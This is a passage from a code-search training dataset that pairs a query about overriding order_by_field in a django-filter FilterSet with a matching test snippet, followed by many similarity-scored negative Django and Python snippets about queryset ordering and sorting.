result.tell()\n\t\t\n\t\tresult.seek(0) # Seek back to the start of the file.\n\t\tresponse.body_file = result\n\t\t\n\t\treturn True", "def render_to_file(properties,file):\n properties['tempfile']=None\n properties['remove_temp']=True\n properties['outfile']=file" ]
[ "0.67716074", "0.6708492", "0.6434953", "0.6190672", "0.61892325", "0.6181426", "0.6171567", "0.6031542", "0.5953594", "0.59264964", "0.587159", "0.5858788", "0.57871544", "0.5752377", "0.57122386", "0.56981695", "0.56687397", "0.5661542", "0.56381875", "0.56225604", "0.560822", "0.5581942", "0.55786645", "0.55767", "0.5574734", "0.55237013", "0.5498826", "0.5497146", "0.54862434", "0.5478343", "0.5470521", "0.54305845", "0.53972214", "0.53968906", "0.5395459", "0.5385356", "0.53772044", "0.53753006", "0.53752387", "0.5373756", "0.53583276", "0.53258884", "0.531551", "0.53120977", "0.5291906", "0.52756333", "0.52616304", "0.52578557", "0.5255777", "0.52452916", "0.52452826", "0.524169", "0.5236103", "0.5233252", "0.5222731", "0.5220387", "0.5219188", "0.52165395", "0.5206184", "0.51960033", "0.51911336", "0.5189426", "0.5188401", "0.51842916", "0.5171774", "0.5168048", "0.51671344", "0.51607364", "0.51607364", "0.5151243", "0.51419747", "0.5138908", "0.5124769", "0.5119853", "0.5119807", "0.5119603", "0.5116243", "0.5111749", "0.51068753", "0.5106738", "0.5085634", "0.5085299", "0.5081319", "0.5073705", "0.5073043", "0.5061898", "0.50490636", "0.5041407", "0.5040885", "0.50303406", "0.50273156", "0.5027141", "0.501512", "0.50138295", "0.5007945", "0.5006212", "0.49989682", "0.49977255", "0.49968487", "0.49960783" ]
0.55854136
21
Set the `order_by_field` on the filterset and ensure that the field name is respected.
def test_ordering_with_overridden_field_name(self): class F(FilterSet): class Meta: model = User fields = ['username', 'status'] order_by = ['status'] order_by_field = 'order' f = F({'order': 'status'}, queryset=self.qs) self.assertQuerysetEqual( f.qs, ['carl', 'alex', 'jacob', 'aaron'], lambda o: o.username)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_ordering_with_overridden_field_name(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = ['status']\n order_by_field = 'order'\n\n f = F().form\n self.assertNotIn('o', f.fields)\n self.assertIn('order', f.fields)\n self.assertEqual(f.fields['order'].choices, [('status', 'Status')])", "def test_ordering_with_overridden_field_name_and_descending(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = ['status', '-status']\n order_by_field = 'order'\n\n f = F().form\n self.assertNotIn('o', f.fields)\n self.assertIn('order', f.fields)\n self.assertEqual(f.fields['order'].choices, [('status', 'Status'), ('-status', 'Status (descending)')])", "def order_by(self, order_by):\n\n self._order_by = order_by", "def set_sort_by(self, sort_by):\n\n\t\tif sort_by is not None and not isinstance(sort_by, str):\n\t\t\traise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: sort_by EXPECTED TYPE: str', None, None)\n\t\t\n\t\tself.__sort_by = sort_by\n\t\tself.__key_modified['sort_by'] = 1", "def user_order_by(self, field):\n # Get ordering model.\n model_label = order.utils.resolve_labels('.'.join(\\\n [self.model._meta.app_label, self.model._meta.object_name]))\n orderitem_set = getattr(self.model, \\\n order.utils.resolve_order_item_related_set_name(model_label))\n order_model = orderitem_set.related.model\n\n # Resolve ordering model table name.\n db_table = order_model._meta.db_table\n\n # Add ordering field as extra queryset fields.\n pk_name = self.model._meta.pk.attname\n\n # If we have a descending query remove '-' from field name when quering.\n sanitized_field = field.lstrip('-')\n\n extra_select = {\n sanitized_field: '(SELECT %s from %s WHERE item_id=%s.%s)' % \\\n (sanitized_field, db_table, self.model._meta.db_table, pk_name)\n }\n\n # Use original field name when ordering to allow for descending.\n return self.extra(select=extra_select).all().order_by(field)", "def order_queryset(self, queryset):\n if ordering := self.request.query_params.get(\"ordering\"):\n order_by = []\n regex = re.compile(r\"-?annotations__(?P<field_id>\\d+)\")\n fields = [field.strip() for field in ordering.split(\",\")]\n for match in filter(None, map(regex.match, fields)):\n field_id = match.group(\"field_id\")\n annotation_value = AnnotationValue.objects.filter(\n entity_id=OuterRef(\"pk\"), field_id=field_id\n ).values(\"_value__value\")\n annotate = {f\"_order_{field_id}\": Subquery(annotation_value)}\n queryset = queryset.annotate(**annotate)\n sign = \"-\" if match.string.startswith(\"-\") else \"\"\n order_by.append(f\"{sign}_order_{field_id}\")\n if order_by:\n queryset = queryset.order_by(*order_by)\n return queryset", "def order_by(self, *field_names):\n qs = copy(self)\n qs._order_by = field_names\n return qs", "def order_by(self, field_paths, order=None):\n raise NotImplementedError(\"This should have been implemented.\")", "def order_by(self, *fields):\n self.query = self.query.sort(self._parse_order_spec(fields))\n return self", "def sortby(self, sortby):\n self._sortby = sortby", "def sort_queryset(\n queryset: QuerySet, sort_by: SortInputObjectType, reversed: bool\n) -> QuerySet:\n sorting_direction = sort_by.direction\n if reversed:\n sorting_direction = REVERSED_DIRECTION[sorting_direction]\n\n sorting_field = sort_by.field\n sorting_attribute = getattr(sort_by, \"attribute_id\", None)\n\n if sorting_field is not None and sorting_attribute is not None:\n raise GraphQLError(\n \"You must provide 
either `field` or `attributeId` to sort the products.\"\n )\n elif sorting_attribute is not None: # empty string as sorting_attribute is valid\n return _sort_queryset_by_attribute(\n queryset, sorting_attribute, sorting_direction\n )\n\n sort_enum = sort_by._meta.sort_enum\n sorting_fields = sort_enum.get(sorting_field)\n sorting_field_name = sorting_fields.name.lower()\n\n custom_sort_by = getattr(sort_enum, f\"qs_with_{sorting_field_name}\", None)\n if custom_sort_by:\n queryset = custom_sort_by(queryset)\n\n sorting_field_value = sorting_fields.value\n sorting_list = [f\"{sorting_direction}{field}\" for field in sorting_field_value]\n\n return queryset.order_by(*sorting_list)", "def get_queryset(self):\n qs = super(SortForm, self).get_queryset()\n\n qs = self.pre_sort(qs)\n\n # Ensure that the form is valid\n if not self.is_valid():\n return qs\n\n # Do Sorting\n sorts = self.cleaned_data.get('sort', [])\n order_by = []\n for sort in sorts:\n param = self.HEADERS[abs(sort) - 1]['column']\n if sort < 0:\n param = '-' + param\n order_by.append(param)\n\n if order_by:\n qs = qs.order_by(*order_by)\n\n qs = self.post_sort(qs)\n\n return qs", "def order_by(self, *field_names):\n assert self.query.can_filter(), \\\n \"Cannot reorder a query once a slice has been taken.\"\n\n clone = self._clone()\n for field_name in field_names:\n clone.query.order_by.append(field_name)\n return clone", "def test_ordering_descending_unset(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = True\n\n f = F({'o': '-username'}, queryset=self.qs)\n self.assertQuerysetEqual(\n f.qs, ['jacob', 'carl', 'alex', 'aaron'], lambda o: o.username)", "def order_by(self, value):\r\n # collapse empty values to ()\r\n order_by = () if not value else value\r\n # accept string\r\n order_by = order_by.split(',') if isinstance(order_by, six.string_types) else order_by\r\n valid = []\r\n # everything's been converted to a iterable, accept iterable!\r\n for alias in order_by:\r\n name = OrderBy(alias).bare\r\n if name in self.columns and self.columns[name].orderable:\r\n valid.append(alias)\r\n self._order_by = OrderByTuple(valid)\r\n self.data.order_by(self._order_by)", "def filter_and_order(cls, *args, **kwargs):\n return cls.query.filter_by(**kwargs).order_by(*args)", "def clean_order_by(self):\n\t\tresult = None\n\t\tmap_id = self.cleaned_data.get('order_by', '')\n\t\tif self._ORDER_BY_MAP.has_key(map_id):\n\t\t\tresult = self._ORDER_BY_MAP.get(map_id)\n\t\telse:\n\t\t\tresult = self._ORDER_BY_MAP.values()[0]\n\t\treturn result", "def sort_by(self, sort_direction: epl_imagery_pb2.SortDirection):\n # TODO if you want to sort by multiple parameters, then this class will have to have a pointer to the filter\n if self.metadata_filters.sorted_by:\n self.metadata_filters.sorted_by.query_params.sort_direction = epl_imagery_pb2.NOT_SORTED\n\n self.metadata_filters.sorted_by = self\n\n # class that contains it, and upon updating this class there is a call back to the container class to insert\n # this parameter in a list\n self.query_params.sort_direction = sort_direction\n self.b_initialized = True", "def order_by(self, *fields):\n self._evaluated = False\n if self._order is None:\n self._order = []\n\n for field in fields:\n direction = \"asc\"\n if field.startswith('-'):\n direction = \"desc\"\n field = field[1:]\n\n self._order.append({ field : direction })\n\n return self", "def orderby(cls, field, desc=False):\n cls.runtime.set_orderby((field, desc))\n return cls", "def 
order_by(self, field_name, direction=ASCENDING):\n\n from jetengine.fields.base_field import BaseField\n from jetengine.fields.list_field import ListField\n\n if isinstance(field_name, (ListField,)):\n raise ValueError(\n \"Can't order by a list field. If you meant to order by the size of the list, please use either an Aggregation Pipeline query (look for Document.objects.aggregate) or create an IntField with the size of the list field in your Document.\"\n )\n\n if isinstance(field_name, (BaseField,)):\n field_name = field_name.name\n\n if field_name not in self.__klass__._fields:\n raise ValueError(\n \"Invalid order by field '%s': Field not found in '%s'.\" % (field_name, self.__klass__.__name__)\n )\n\n field = self.__klass__._fields[field_name]\n self._order_fields.append((field.db_field, direction))\n return self", "def pre_sort(self, qs):\n return qs", "def ordering(self, qs):\n request = self.request\n # Number of columns that are used in sorting\n try:\n i_sorting_cols = int(request.REQUEST.get('iSortingCols', 0))\n except ValueError:\n i_sorting_cols = 0\n\n order = []\n order_columns = self.get_order_columns()\n for i in range(i_sorting_cols):\n # sorting column\n try:\n i_sort_col = int(request.REQUEST.get('iSortCol_%s' % i))\n except ValueError:\n i_sort_col = 0\n # sorting order\n s_sort_dir = request.REQUEST.get('sSortDir_%s' % i)\n\n sdir = '-' if s_sort_dir == 'desc' else ''\n\n sortcol = order_columns[i_sort_col]\n if isinstance(sortcol, list):\n for sc in sortcol:\n order.append('%s%s' % (sdir, sc))\n else:\n order.append('%s%s' % (sdir, sortcol))\n if order:\n return qs.order_by(*order)\n return qs", "def ordering(self):\r\n if hasattr(self, \"queryset\"):\r\n aliases = {}\r\n for bound_column in self.table.columns:\r\n aliases[bound_column.order_by_alias] = bound_column.order_by\r\n try:\r\n return next(segment(self.queryset.query.order_by, aliases))\r\n except StopIteration:\r\n pass", "def order_by(self, field, descending=False):\n self._order_by.append((field, descending))\n return self", "def orderby():\n pass", "def order_by(self, *field_names):\n if self.query.is_sliced:\n raise TypeError(\"Cannot reorder a query once a slice has been taken.\")\n obj = self._chain()\n obj.query.clear_ordering(force=True, clear_default=False)\n obj.query.add_ordering(*field_names)\n return obj", "def get_sort_field(self, kind, order, is_number):\n pass", "def order(self, field, direction=Order.ASC):\n if field == 'id':\n field = '_id'\n\n self._order_by.append((field, direction))\n\n return self", "def sortby(self):\n ...", "def get_sort_by(self):\n\n\t\treturn self.__sort_by", "def get_queryset(self):\n rs = super(BaseQuerysetMixin, self).get_queryset()\n if self.request.GET.get(\"ordering\") is None:\n rs = rs.order_by(\"id\")\n return rs", "def get_sort_by(self) -> SortField:\n if hasattr(self, \"json\") and isinstance(self.json, dict):\n sort_by_str = self.json.get(\"sort_by\", \"relevance\")\n if SortField.is_sort_field(sort_by_str):\n return SortField.from_str(sort_by_str)\n return SortField.relevance", "def __order_queryset(self, queryset):\n if self.get_paginate_by(queryset) and \\\n self.request.method == \"POST\" and self.__has_initially_selected_items():\n current_order_by = list(queryset.query.order_by)\n whenqueries = []\n max_index = 0\n for index, value in enumerate(self.get_selected_values_queryset().order_by(*current_order_by)):\n whenqueries.append(models.When(pk=value.pk, then=models.Value(index)))\n max_index = index\n queryset = queryset.annotate(\n 
cradmin_multiselect2_ordering=models.Case(\n *whenqueries,\n default=max_index + 1,\n output_field=models.IntegerField()\n )\n )\n order_by = ['cradmin_multiselect2_ordering']\n order_by.extend(current_order_by)\n queryset = queryset.order_by(*order_by)\n return queryset", "def order_by(self, *args):\n order_clauses = self.order_clauses[:]\n related_clauses = self.related_clauses[:]\n model = self.proxy.model\n for arg in args:\n if isinstance(arg, str):\n # Convert django-style to sqlalchemy ordering column\n if arg[0] == '-':\n field = arg[1:]\n ascending = False\n else:\n field = arg\n ascending = True\n\n col = resolve_member_column(model, field, related_clauses)\n\n if ascending:\n clause = col.asc()\n else:\n clause = col.desc()\n else:\n clause = arg\n if clause not in order_clauses:\n order_clauses.append(clause)\n return self.clone(order_clauses=order_clauses,\n related_clauses=related_clauses)", "def order_by(self):\r\n if self.column.order_by is not None:\r\n order_by = self.column.order_by\r\n else:\r\n # default to using column accessor as data source sort key\r\n order_by = OrderByTuple((self.accessor, ))\r\n return order_by.opposite if self.order_by_alias.is_descending else order_by", "def post_sort(self, qs):\n return qs", "def get_queryset(self):\n\n qs = super().get_queryset() # get company specific queryset\n\n filters = dict(self.request.GET.lists()) # dictionary of lists\n\n # pull out order_by and order\n order_by = filters.pop(\"order_by\", None)\n order = filters.pop(\"order\", None)\n\n # Ordering by JSON field taken from\n # https://stackoverflow.com/questions/36641759/django-1-9-jsonfield-order-by\n # Jan 2, 2018\n\n if order_by:\n if order:\n pass\n # TODO: Figure out what can be done for ordering...\n\n else:\n qs = qs.order_by(\"-id\") # default to descending id order\n\n for exp_filter in filters:\n try:\n qs = self.FILTERS[exp_filter](qs, filters[exp_filter])\n except KeyError:\n pass\n # do nothing if not a filter\n\n return qs", "def filter_queryset(self, qs):\n qs = super(ReleaseViewSet, self).filter_queryset(qs)\n if getattr(self, 'order_queryset', False):\n return sorted(qs, key=models.Release.version_sort_key)\n return qs", "def order_queryset_by_sort_order(get, qs):\n\n def get_string_from_tuple_list(lstTuples, number):\n \"\"\"Get the string value corresponding to a number in a list of number-string tuples\"\"\"\n sBack = [tup[1] for tup in lstTuples if tup[0] == number]\n return sBack\n\n # Helper: order a queryset on field [sOrder], which is a number from a list of tuples named [sListName]\n def order_queryset_by_tuple_list(qs, sOrder, sListName):\n \"\"\"Order a queryset on field [sOrder], which is a number from a list of tuples named [sListName]\"\"\"\n\n # Get a list of tuples for this sort-order\n tpList = build_choice_list(sListName)\n # Determine sort order: ascending is default\n bReversed = False\n if (sOrder[0:1] == '-'):\n # A starting '-' sign means: descending order\n sOrder = sOrder[1:]\n bReversed = True\n\n # Order the list of tuples alphabetically\n # (NOTE: they are alphabetical from 'build_choice_list()', except for the values 0,1)\n tpList = sorted(tpList, key=operator.itemgetter(1))\n # Order by the string-values in the tuple list\n return sorted(qs, key=lambda x: get_string_from_tuple_list(tpList, getattr(x, sOrder)), reverse=bReversed)\n\n # Set the default sort order\n sOrder = 'woord' # Default sort order if nothing is specified\n # See if the form contains any sort-order information\n if ('sortOrder' in get and 
get['sortOrder'] != ''):\n # Take the user-indicated sort order\n sOrder = get['sortOrder']\n\n # The ordering method depends on the kind of field:\n # (1) text fields are ordered straightforwardly\n # (2) fields made from a choice_list need special treatment\n if (sOrder.endswith('handedness')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Handedness\")\n elif (sOrder.endswith('domhndsh') or sOrder.endswith('subhndsh')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Handshape\")\n elif (sOrder.endswith('locprim')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Location\")\n else:\n # Use straightforward ordering on field [sOrder]\n ordered = qs.order_by(sOrder)\n\n # return the ordered list\n return ordered", "def get_queryset(self):\n search_str = self.request.GET.get('search')\n col_nm = self.request.GET.get('sort_by', \"name\")\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', \"ASC\")\n self.sort_ordr=sort_order\n\n if search_str:\n search_str = self.request.GET.get('search', None)\n a = Q(name__icontains=search_str)\n b = Q(administrator__first_name__icontains = search_str)\n c = Q(administrator__last_name__icontains = search_str)\n d = Q(administrator__username__icontains = search_str)\n e = Q(types__name__icontains = search_str)\n f = Q(description__icontains = search_str)\n objects = Organization.objects.filter(a | b | c | d | e | f).distinct()\n\n else: # SORTING BY COL_NM\n if col_nm in ['name', 'description'] :\n objects = Organization.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n elif col_nm =='administrator__first_name':\n objects=Organization.objects.filter().order_by(col_nm)\n if sort_order == \"DESC\":\n objects = objects.reverse()\n else:\n objects=Organization.objects.extra(select=\n {'name':'lower(name)'}).order_by('name')\n\n\n return objects", "def get_queryset(self, request):\n queryset = self.model._default_manager.all()\n queryset = queryset.filter(user=request.user)\n ordering = self.get_ordering()\n if ordering:\n if isinstance(ordering, str):\n ordering = (ordering,)\n queryset = queryset.order_by(*ordering)\n return queryset", "def test_relatedfieldlistfilter_foreignkey_default_ordering(self):\n\n class BookAdmin(ModelAdmin):\n list_filter = (\"employee\",)\n\n self.addCleanup(setattr, Employee._meta, \"ordering\", Employee._meta.ordering)\n Employee._meta.ordering = (\"name\",)\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(self.jack.pk, \"Jack Red\"), (self.john.pk, \"John Blue\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def test_entities__Entity__setFieldOrder__2(entity_with_field):\n entity = entity_with_field\n entity.setFieldOrder(['dummy2', 'I-do-not-exist', 'dummy'])\n assert ['dummy2', 'dummy'] == entity.getFieldOrder()\n # Unknown field names are not written into storage:\n order_storage = zope.component.getUtility(IOrderStorage)\n assert (['dummy2', 'dummy'] ==\n order_storage.byNamespace(entity.order_storage_namespace))", "def test_entities__Entity__setFieldOrder__1(entity_with_field, field):\n assert [] == entity_with_field.getFieldOrder()\n entity_with_field.setFieldOrder(['dummy2', field.__name__, 'dummy'])\n assert (['dummy2', field.__name__, 'dummy'] ==\n entity_with_field.getFieldOrder())", 
"def test_relatedonlyfieldlistfilter_foreignkey_default_ordering(self):\n\n class BookAdmin(ModelAdmin):\n list_filter = ((\"employee\", RelatedOnlyFieldListFilter),)\n\n albert = Employee.objects.create(name=\"Albert Green\", department=self.dev)\n self.djangonaut_book.employee = albert\n self.djangonaut_book.save()\n self.bio_book.employee = self.jack\n self.bio_book.save()\n\n self.addCleanup(setattr, Employee._meta, \"ordering\", Employee._meta.ordering)\n Employee._meta.ordering = (\"name\",)\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(albert.pk, \"Albert Green\"), (self.jack.pk, \"Jack Red\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def _get_order_by(order, orderby, order_by_fields):\n try:\n # Find the actual database fieldnames for the keyword.\n db_fieldnames = order_by_fields[orderby]\n except KeyError:\n raise ValueError(\n \"Invalid value for 'orderby': '{}', supported values are: {}\".format(\n orderby, \", \".join(sorted(order_by_fields.keys()))\n )\n )\n\n # Default to descending for some fields, otherwise be ascending\n is_desc = (not order and orderby in ORDER_BY_DESC) or (order or \"asc\").lower() in (\n \"desc\",\n \"descending\",\n )\n\n if is_desc:\n return map(lambda name: \"-\" + name, db_fieldnames)\n else:\n return db_fieldnames", "def get_ordering(self, request, queryset, view):\n ordering = []\n params = get_datatables_ordering(request.query_params)\n if params:\n fields = [param.strip() for param in params.split(',')]\n ordering = self.remove_invalid_fields(queryset, fields, view, request)\n if ordering:\n return ordering\n\n # No ordering was included, or all the ordering fields were invalid\n return self.get_default_ordering(view)", "def set_sorting_enabled(self, value):\n self.tableWidget.setSortingEnabled(value)", "def sort(self, column, order=Qt.AscendingOrder):\n if(column == Columns.Date):\n self.sorting = Sorting.Date\n elif(column == Columns.Code):\n self.sorting = Sorting.Code\n elif(column == Columns.User):\n self.sorting = Sorting.User\n elif(column == Columns.Tags):\n self.sorting = Sorting.Priviledges\n elif(column == Columns.TimesRequested):\n self.sorting = Sorting.TimesRequested\n\n if(order == Qt.DescendingOrder):\n self.sorting |= Sorting.Reversed\n\n self._reset_view()", "def _apply_order_by_and_limit(objects, order_by=None, limit=None):\n if order_by:\n try:\n # Note: currently we sort only by the first column from the list\n order_by = order_by[0]\n order_field = order_by[\"name\"]\n order_desc = order_by.get(\"desc\", False)\n objects = sorted(\n objects,\n key=lambda obj: getattr(obj, order_field),\n reverse=order_desc,\n )\n except:\n raise BadQueryException(\"Bad query: Invalid 'order_by' parameter\")\n\n if limit:\n try:\n from_, to_ = limit\n objects = objects[from_: to_]\n except:\n raise BadQueryException(\"Bad query: Invalid 'limit' parameter.\")\n\n return objects", "def test_entities__Entity__getFieldOrder__2(entity_with_field, field):\n entity = entity_with_field\n entity.setFieldOrder([field.__name__, 'dummy'])\n assert [field.__name__, 'dummy'] == entity.getFieldOrder()", "def test_order_by(self):\n self.Person(name=\"User B\", age=40).save()\n self.Person(name=\"User A\", age=20).save()\n self.Person(name=\"User C\", age=30).save()\n\n names = [p.name for p in self.Person.objects.order_by(\"-age\")]\n assert names 
== [\"User B\", \"User C\", \"User A\"]\n\n names = [p.name for p in self.Person.objects.order_by(\"+age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n names = [p.name for p in self.Person.objects.order_by(\"age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n ages = [p.age for p in self.Person.objects.order_by(\"-name\")]\n assert ages == [30, 40, 20]\n\n ages = [p.age for p in self.Person.objects.order_by()]\n assert ages == [40, 20, 30]\n\n ages = [p.age for p in self.Person.objects.order_by(\"\")]\n assert ages == [40, 20, 30]", "def queryset(self, ordering=None):\r\n qs = self.model._default_manager.get_query_set()\r\n if not ordering:\r\n ordering = self.ordering or () # otherwise we might try to *None, which is bad ;)\r\n if ordering:\r\n qs = qs.order_by(*ordering)\r\n return qs", "def sort(self, *order_fields):\n return MockSearch(\n self, self._query, self.nested_filter_calls, order_fields,\n self._script_fields\n )", "def order_by(self, aliases):\r\n accessors = []\r\n for alias in aliases:\r\n bound_column = self.table.columns[OrderBy(alias).bare]\r\n # bound_column.order_by reflects the current ordering applied to\r\n # the table. As such we need to check the current ordering on the\r\n # column and use the opposite if it doesn't match the alias prefix.\r\n if alias[0] != bound_column.order_by_alias[0]:\r\n accessors += bound_column.order_by.opposite\r\n else:\r\n accessors += bound_column.order_by\r\n if hasattr(self, \"queryset\"):\r\n translate = lambda accessor: accessor.replace(Accessor.SEPARATOR, QUERYSET_ACCESSOR_SEPARATOR)\r\n self.queryset = self.queryset.order_by(*(translate(a) for a in accessors))\r\n else:\r\n self.list.sort(key=OrderByTuple(accessors).key)", "def get_queryset(self):\n\n search_str = self.request.GET.get('search', None)\n col_nm = self.request.GET.get('sort_by', \"name\")\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', \"ASC\")\n self.sort_ordr=sort_order\n if search_str:\n a = Q(name__icontains = search_str)\n b = Q(description__icontains = search_str)\n objects = self.model.objects.filter(a | b).distinct()\n\n else:\n objects = OrganizationType.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n return objects", "def sortby(self):\n return self._sortby", "def order_query(self, query):\n\n direction = desc if self.direction == 'desc' else asc\n if self.order in inspect(self.model_class).columns.keys():\n attribute = getattr(self.model_class, self.order)\n elif self.order == 'group.name':\n attribute = func.coalesce(UserGroup.name, '')\n elif self.order == 'user.realname':\n attribute = func.coalesce(User.realname, '')\n elif self.order == 'user.username':\n attribute = func.coalesce(User.username, '')\n elif self.order == 'user.name':\n attribute = func.coalesce(User.realname, User.username, '')\n else:\n attribute = self.model_class.first_issue\n\n return query.order_by(None).order_by(direction(attribute))", "def _sort_by_query_string_param(self, songs):\n orderable_fields_dict = {\n 'name': Lower('name'),\n 'artist': Lower('artist__name'),\n 'avgRating': 'average_rating',\n 'year': 'year'\n }\n\n order_by = self.request.query_params.get('orderBy', None)\n\n if order_by is not None and order_by in orderable_fields_dict:\n order_field = orderable_fields_dict[order_by]\n\n # sort in direction indicated by `direction` query string param\n # or ascending, by default\n direction = 
self.request.query_params.get('direction', 'asc')\n if direction == 'desc':\n if order_by == 'name' or order_by == 'artist':\n order_field = order_field.desc()\n else:\n order_field = '-' + order_field\n\n # add annotation for average_rating to sort by computed property\n if order_by == 'avgRating':\n songs = songs.annotate(\n average_rating=Avg('ratings__rating')\n )\n\n songs = songs.order_by(order_field)\n\n return songs", "def sort_from_request(request):\n order = request.args.get('order_by')\n if order:\n key, direction = order.split(',')\n reverse = False if direction == 'ASC' else True\n return Sort(key, reverse)\n else:\n return Sort(None)", "def validate_sort_order(filter, main_field):\n\n # The tiebreaker fields are always in the same order, but\n # if the main sort field is one of the tiebreaker fields,\n # it's removed from the list -- there's no need to sort on\n # that field a second time.\n default_sort_fields = [\n {x: \"asc\"} for x in ['sort_author', 'sort_title', 'work_id']\n if x != main_field\n ]\n assert default_sort_fields == filter.sort_order[1:]\n return filter.sort_order[0]", "def test_relatedfieldlistfilter_foreignkey_ordering(self):\n\n class EmployeeAdminWithOrdering(ModelAdmin):\n ordering = (\"name\",)\n\n class BookAdmin(ModelAdmin):\n list_filter = (\"employee\",)\n\n site.register(Employee, EmployeeAdminWithOrdering)\n self.addCleanup(lambda: site.unregister(Employee))\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(self.jack.pk, \"Jack Red\"), (self.john.pk, \"John Blue\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def _orderby_expression(self):\n return ''", "def order_by(cls, *args):\n return cls.query.order_by(*args)", "def order_by(self, column, direction=\"ASC\"):\n self._order_by += ((column, direction),)\n return self", "def add_sort(self, field_name, ascending=True):\n if not self._query_is_empty():\n self.query.AND()\n if ascending:\n logger.info(\"Sorting records by {} in ascending order.\".format(field_name))\n self.query.field(field_name.lower()).order_ascending() # lowercase for convenience\n logger.debug(\"sysparm_query contains: {q}\".format(q=self.query._query))\n else:\n logger.info(\"Sorting records by {} in descending order.\".format(field_name))\n self.query.field(field_name.lower()).order_descending()\n logger.debug(\"sysparm_query contains: {q}\".format(q=self.query._query))", "def get_query_set(model_class, sort_column=\"id\", sort_descending=True, filters={}): \n sort_modifier = \"\"\n if sort_descending:\n sort_modifier = \"-\"\n return model_class.objects.filter(**filters).order_by(\"%s%s\"% (sort_modifier, sort_column))", "def test_relatedonlyfieldlistfilter_foreignkey_ordering(self):\n\n class EmployeeAdminWithOrdering(ModelAdmin):\n ordering = (\"name\",)\n\n class BookAdmin(ModelAdmin):\n list_filter = ((\"employee\", RelatedOnlyFieldListFilter),)\n\n albert = Employee.objects.create(name=\"Albert Green\", department=self.dev)\n self.djangonaut_book.employee = albert\n self.djangonaut_book.save()\n self.bio_book.employee = self.jack\n self.bio_book.save()\n\n site.register(Employee, EmployeeAdminWithOrdering)\n self.addCleanup(lambda: site.unregister(Employee))\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = 
modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(albert.pk, \"Albert Green\"), (self.jack.pk, \"Jack Red\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def on_combo_sort_col_names_currentIndexChanged(self, index):\n if self.ui.sort_radio_asc.isChecked():\n self.model.setSort(index, Qt.AscendingOrder)\n else:\n self.model.setSort(index, Qt.DescendingOrder)\n self.model.select()", "def order_by_alias(self):\r\n order_by = OrderBy((self.table.order_by or {}).get(self.name, self.name))\r\n order_by.next = order_by.opposite if self.is_ordered else order_by\r\n return order_by", "def update_order_property_setter(self, has_custom, fieldname):\n\t\tproperty_name = f\"{fieldname}_order\"\n\t\tif has_custom:\n\t\t\t# save the order of the actions and links\n\t\t\tself.make_property_setter(\n\t\t\t\tproperty_name, json.dumps([d.name for d in self.get(fieldname)]), \"Small Text\"\n\t\t\t)\n\t\telse:\n\t\t\tfrappe.db.delete(\"Property Setter\", dict(property=property_name, doc_type=self.doc_type))", "def set_sort_order(self, sort_order):\n\n\t\tif sort_order is not None and not isinstance(sort_order, str):\n\t\t\traise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: sort_order EXPECTED TYPE: str', None, None)\n\t\t\n\t\tself.__sort_order = sort_order\n\t\tself.__key_modified['sort_order'] = 1", "def changeOrder(self):\n order = self.orderSpinBox.value()\n nfilter = int(str(self.filterComboBox.currentText()))\n if order > nfilter - 2:\n order = nfilter - 2\n if order < 1:\n order = 1\n self.orderSpinBox.setValue(order)\n self.order = order", "def order_by(self, *colnames):\r\n if len(colnames) == 0:\r\n clone = copy.deepcopy(self)\r\n clone._order = []\r\n return clone\r\n\r\n conditions = []\r\n for colname in colnames:\r\n conditions.append('\"{}\" {}'.format(*self._get_ordering_condition(colname)))\r\n\r\n clone = copy.deepcopy(self)\r\n clone._order.extend(conditions)\r\n return clone", "def resolve_orderby(self, orderby: Optional[Union[List[str], str]]) -> List[OrderBy]:\n validated: List[OrderBy] = []\n\n if orderby is None:\n return validated\n\n if isinstance(orderby, str):\n if not orderby:\n return validated\n\n orderby = [orderby]\n\n orderby_columns: List[str] = orderby if orderby else []\n\n resolved_orderby: Union[str, SelectType, None]\n for orderby in orderby_columns:\n bare_orderby = orderby.lstrip(\"-\")\n bare_orderby = self.tag_to_prefixed_map.get(bare_orderby, bare_orderby)\n try:\n # Allow ordering equations with the calculated alias (ie. equation[0])\n if is_equation_alias(bare_orderby):\n resolved_orderby = bare_orderby\n # Allow ordering equations directly with the raw alias (ie. 
